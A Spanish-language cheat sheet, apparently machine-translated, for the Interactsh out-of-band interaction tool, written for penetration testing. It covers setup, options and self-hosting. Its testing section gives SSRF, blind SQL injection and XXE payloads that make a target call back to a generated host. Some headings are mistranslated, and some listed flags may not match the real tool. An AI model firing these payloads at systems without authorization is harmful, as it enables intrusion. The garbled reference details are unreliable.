Interactsh OOB Interaction Gathering Cheat Sheet

Sinopsis

Interactsh es una herramienta de código abierto desarrollada por Project Discovery para detectar interacciones fuera de banda (OOB). Está diseñado para identificar vulnerabilidades que causan interacciones externas, como Server-Side Request Forgery (SSRF), Blind SQL Injection, XML External Entity (XXE) Injection, y otras vulnerabilidades que pueden no ser inmediatamente visibles a través de métodos de prueba tradicionales.

Lo que hace que Interactsh sea único es su enfoque integral para las pruebas de OOB. A diferencia de otras herramientas que se centran en protocolos específicos, Interactsh puede detectar interacciones entre múltiples protocolos, incluyendo DNS, HTTP(S), SMTP(S), y LDAP. Consiste en un componente servidor que captura y registra estas interacciones y un componente cliente que genera URLs y monitores de prueba únicos para cualquier interacción con esas URL.

Interactsh es ampliamente utilizado en las pruebas de seguridad para identificar vulnerabilidades que de otro modo no se detectan. Es particularmente valioso para los cazadores de recompensas, los testadores de penetración y los investigadores de seguridad que necesitan verificar la existencia de vulnerabilidades que dependen de interacciones externas. La herramienta también está integrada con Nuclei, otra herramienta Project Discovery, permitiendo un análisis de vulnerabilidad automatizado con capacidades de detección de OOB.

Instalación

Instalación del cliente

Usando Go

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

# Verify installation
interactsh-client -version

Usando Docker

# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh client using Docker
docker run -it projectdiscovery/interactsh:latest client -h

Utilizando Homebrew (macOS)

# Install using Homebrew
brew install interactsh-client

# Verify installation
interactsh-client -version

Utilizando PDTM (Project Discovery Tools Manager)

# Install PDTM first if not already installed
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest

# Install Interactsh client using PDTM
pdtm -i interactsh-client

# Verify installation
interactsh-client -version

Instalación de servidor (autoaplazado)

Usando Go

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest

# Verify installation
interactsh-server -version

Usando Docker

# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh server using Docker
docker run -it projectdiscovery/interactsh:latest server -h

Uso básico

Uso del cliente

# Start the client with default settings
interactsh-client

# Start the client with verbose output
interactsh-client -v

# Start the client with a specific server
interactsh-client -server your-interactsh-server.com

Uso del servidor (auto-hostado)

# Start the server with default settings
interactsh-server

# Start the server with a specific domain
interactsh-server -domain your-domain.com

# Start the server with verbose output
interactsh-server -v

Opciones de salida

# Save interactions to a file
interactsh-client -o interactions.log

# Output in JSON format
interactsh-client -json -o interactions.json

# Silent mode (no banner)
interactsh-client -silent

Configuración del cliente

Configuración básica

# Set polling interval (seconds)
interactsh-client -poll-interval 5

# Set interaction timeout (seconds)
interactsh-client -interaction-timeout 60

# Enable persistent session
interactsh-client -persistent-session

# Use a specific correlation ID
interactsh-client -correlation-id your-correlation-id

Autenticación

# Use token for authentication
interactsh-client -token your-auth-token

# Use a specific server with token
interactsh-client -server your-interactsh-server.com -token your-auth-token

Filtro

# Filter interactions by type
interactsh-client -filter-type dns,http

# Filter interactions by IP
interactsh-client -filter-ip 1.2.3.4

# Filter interactions by content
interactsh-client -filter-content "admin"

Configuración del servidor (Auto-Hosted)

Configuración de dominio

# Set domain for the server
interactsh-server -domain your-domain.com

# Set wildcard domain
interactsh-server -domain your-domain.com -wildcard

# Set IP address to listen on
interactsh-server -ip 1.2.3.4

Configuración de certificados

# Use Let's Encrypt for certificates
interactsh-server -domain your-domain.com -letsencrypt

# Use custom certificates
interactsh-server -domain your-domain.com -cert cert.pem -key key.pem

Configuración de autenticación

# Enable authentication
interactsh-server -auth

# Set token for authentication
interactsh-server -auth-token your-auth-token

# Set token file for authentication
interactsh-server -auth-token-file tokens.txt

Uso avanzado

Características avanzadas del cliente

# Generate a specific number of URLs
interactsh-client -n 5

# Generate URLs with a specific payload
interactsh-client -payload-template "\\\\{\\\\{random\\\\}\\\\}.your-domain.com"

# Enable DNS callback only
interactsh-client -dns-only

# Enable HTTP callback only
interactsh-client -http-only

# Enable SMTP callback only
interactsh-client -smtp-only

Características avanzadas del servidor

# Enable specific services
interactsh-server -dns -http -smtp -ldap

# Disable specific services
interactsh-server -no-dns -no-http -no-smtp -no-ldap

# Set custom ports
interactsh-server -dns-port 53 -http-port 80 -https-port 443 -smtp-port 25 -smtps-port 587 -ldap-port 389

# Enable metrics
interactsh-server -metrics

Generación de carga útil

# Generate a URL for testing
interactsh-client -generate-url

# Generate multiple URLs
interactsh-client -generate-url -n 5

# Generate URL with specific server
interactsh-client -generate-url -server your-interactsh-server.com

Integración con otras herramientas

Integración con Nuclei

# Use Interactsh with Nuclei
nuclei -u https://example.com -t nuclei-templates/

# Use a specific Interactsh server with Nuclei
nuclei -u https://example.com -t nuclei-templates/ -interactsh-server your-interactsh-server.com

# Disable Interactsh in Nuclei
nuclei -u https://example.com -t nuclei-templates/ -no-interactsh

Integración con Notificar

# Send Interactsh interactions to Discord
interactsh-client|notify -provider discord

# Send filtered interactions to Slack
interactsh-client -filter-type http|notify -provider slack

Integración con scripts personalizados

# Use Interactsh in a bash script
#!/bin/bash
URL=$(interactsh-client -generate-url)
curl -s "https://example.com/test?url=$URL"
interactsh-client -poll-interval 5 -interaction-timeout 30

Pruebas Vulnerabilidades

Pruebas SSRF

# Generate a URL for SSRF testing
URL=$(interactsh-client -generate-url)

# Use the URL in a potential SSRF vulnerability
curl -s "https://example.com/fetch?url=http://$URL/test"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Prueba de inyección de SQL ciego

# Generate a URL for Blind SQL Injection testing
URL=$(interactsh-client -generate-url)

# Use the URL in a SQL query
curl -s "https://example.com/search?id=1' UNION SELECT LOAD_FILE(CONCAT('\\\\',$URL,'\\share'))"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Pruebas XXE Inyección

# Generate a URL for XXE testing
URL=$(interactsh-client -generate-url)

# Create an XML payload with XXE
cat > xxe.xml << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://$URL/xxe">
]>
<foo>&xxe;</foo>
EOF

# Send the XML payload
curl -s -X POST -d @xxe.xml -H "Content-Type: application/xml" https://example.com/api

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Solución de problemas

Cuestiones comunes

No se detectaron interacciones

   # Increase polling interval
   interactsh-client -poll-interval 10

   # Increase interaction timeout
   interactsh-client -interaction-timeout 120

   # Check if the target is behind a firewall
   # Try using different protocols (DNS, HTTP, SMTP)
   ```

2. ** Cuestiones relativas a la Convención**
```bash
   # Check if the server is reachable
   ping your-interactsh-server.com

   # Try a different server
   interactsh-client -server oast.pro

   # Check if your network allows outbound connections
   ```

3. ** Cuestiones relativas a la delincuencia**
```bash
   # Verify token
   interactsh-client -server your-interactsh-server.com -token your-auth-token -v

   # Check if the server requires authentication
   ```

4. **Problemas de configuración de inversores**
```bash
   # Check DNS configuration
   dig ns your-domain.com

   # Verify that your domain's nameservers point to your server
   # Ensure that your server has the necessary ports open
   ```

### Debugging

```bash
# Enable verbose mode for client
interactsh-client -v

# Enable debug mode for client
interactsh-client -debug

# Enable verbose mode for server
interactsh-server -v

# Enable debug mode for server
interactsh-server -debug

Guía de autoaplazamiento

DNS Configuración

Para autohost Interactsh, necesita configurar la configuración DNS de su dominio:

Registrar un dominio (por ejemplo, your-domain.com_)
Configurar registros NS para que tu dominio señale a tu servidor:

   your-domain.com. IN NS ns1.your-domain.com.
   your-domain.com. IN NS ns2.your-domain.com.
   ```
3. Configurar un registro para tus servidores de nombres:

ns1.your-domain.com. IN A your-server-ip ns2.your-domain.com. IN A your-server-ip ```

Configuración del servidor

# Start the server with your domain
interactsh-server -domain your-domain.com

# Enable Let's Encrypt for HTTPS
interactsh-server -domain your-domain.com -letsencrypt

# Enable authentication
interactsh-server -domain your-domain.com -auth -auth-token your-auth-token

Docker Deployment

# Create a docker-compose.yml file
cat > docker-compose.yml << EOF
version: '3'
services:
  interactsh-server:
    image: projectdiscovery/interactsh:latest
    command: server -domain your-domain.com -letsencrypt -auth -auth-token your-auth-token
    ports:
      - "53:53/udp"
      - "80:80"
      - "443:443"
      - "25:25"
      - "587:587"
      - "389:389"
    restart: always
EOF

# Start the server
docker-compose up -d

Configuración

Configuración del cliente Archivo

Interactsh client utiliza un archivo de configuración ubicado en $HOME/.config/interactsh-client/config.yaml. Puede personalizar varios ajustes en este archivo:

# Example configuration file
server: oast.pro
token: your-auth-token
poll-interval: 5
interaction-timeout: 60
filter-type: dns,http

Configuración del servidor Archivo

Interactsh server utiliza un archivo de configuración ubicado en $HOME/.config/interactsh-server/config.yaml_. Puede personalizar varios ajustes en este archivo:

# Example configuration file
domain: your-domain.com
ip: 1.2.3.4
letsencrypt: true
auth: true
auth-token: your-auth-token

Medio ambiente

# Set Interactsh client configuration via environment variables
export INTERACTSH_SERVER=oast.pro
export INTERACTSH_TOKEN=your-auth-token
export INTERACTSH_POLL_INTERVAL=5
export INTERACTSH_INTERACTION_TIMEOUT=60

# Set Interactsh server configuration via environment variables
export INTERACTSH_DOMAIN=your-domain.com
export INTERACTSH_IP=1.2.3.4
export INTERACTSH_LETSENCRYPT=true
export INTERACTSH_AUTH=true
export INTERACTSH_AUTH_TOKEN=your-auth-token

Referencia

Opciones de la línea de mando del cliente

Flag	Description
`-server`	Interactsh server to use
`-token`	Authentication token for the server
`-n`	Number of URLs to generate
`-o, -output`	File to write output to
`-json`	Write output in JSON format
`-v, -verbose`	Show verbose output
`-debug`	Show debug information
`-poll-interval`	Polling interval in seconds
`-interaction-timeout`	Interaction timeout in seconds
`-persistent-session`	Enable persistent session
`-correlation-id`	Correlation ID for the session
`-filter-type`	Filter interactions by type (dns, http, smtp, ldap)
`-filter-ip`	Filter interactions by IP
`-filter-content`	Filter interactions by content
`-generate-url`	Generate URL for testing
`-dns-only`	Enable DNS callback only
`-http-only`	Enable HTTP callback only
`-smtp-only`	Enable SMTP callback only
`-ldap-only`	Enable LDAP callback only
`-payload-template`	Custom payload template
`-version`	Show Interactsh client version

Opciones de la línea de comandos del servidor

Flag	Description
`-domain`	Domain to use for the server
`-ip`	IP address to listen on
`-wildcard`	Enable wildcard domain
`-letsencrypt`	Use Let's Encrypt for certificates
`-cert`	Path to certificate file
`-key`	Path to key file
`-auth`	Enable authentication
`-auth-token`	Authentication token
`-auth-token-file`	File containing authentication tokens
`-dns`	Enable DNS service
`-http`	Enable HTTP service
`-smtp`	Enable SMTP service
`-ldap`	Enable LDAP service
`-no-dns`	Disable DNS service
`-no-http`	Disable HTTP service
`-no-smtp`	Disable SMTP service
`-no-ldap`	Disable LDAP service
`-dns-port`	Port for DNS service
`-http-port`	Port for HTTP service
`-https-port`	Port for HTTPS service
`-smtp-port`	Port for SMTP service
`-smtps-port`	Port for SMTPS service
`-ldap-port`	Port for LDAP service
`-metrics`	Enable metrics
`-v, -verbose`	Show verbose output
`-debug`	Show debug information
`-version`	Show Interactsh server version

Interacción apoyada Tipos

Type	Description
`dns`	DNS interactions
`http`	HTTP/HTTPS interactions
`smtp`	SMTP/SMTPS interactions
`ldap`	LDAP interactions

Recursos

-...

*Esta hoja de trampa proporciona una referencia completa para el uso de Interactsh, desde el uso básico del cliente y del servidor hasta la configuración avanzada e integración con otras herramientas. Para la información más actualizada, consulte siempre la documentación oficial. *